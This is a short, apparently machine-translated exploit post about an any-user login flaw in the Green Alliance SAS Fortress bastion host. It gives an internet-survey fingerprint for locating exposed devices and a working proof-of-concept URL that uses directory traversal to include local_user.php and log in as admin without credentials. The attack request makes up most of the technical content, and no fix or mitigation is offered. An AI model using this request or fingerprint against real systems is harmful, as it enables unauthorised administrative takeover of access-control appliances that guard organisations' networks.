Green Alliance Sas Fortress Local_user Php Any User Login Vulnerability
Green Alliance Sas Fortress Local_user Php Any User Login Vulnerability
Green Alliance SAS Fortress local_user.php Any user login vulnerability
Vulnerability Description
Green Alliance Fortress has a vulnerability to log in any user. The attacker uses the vulnerability to include www/local_user.php to realize any user login.
Vulnerability Impact
Green League SAS Fortress
Network surveying and mapping
body=”‘/needUsbkey.php?username=’”</span>
Vulnerability reappears
Login page
Verify POC
/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
This post is licensed under CC BY 4.0 by the author.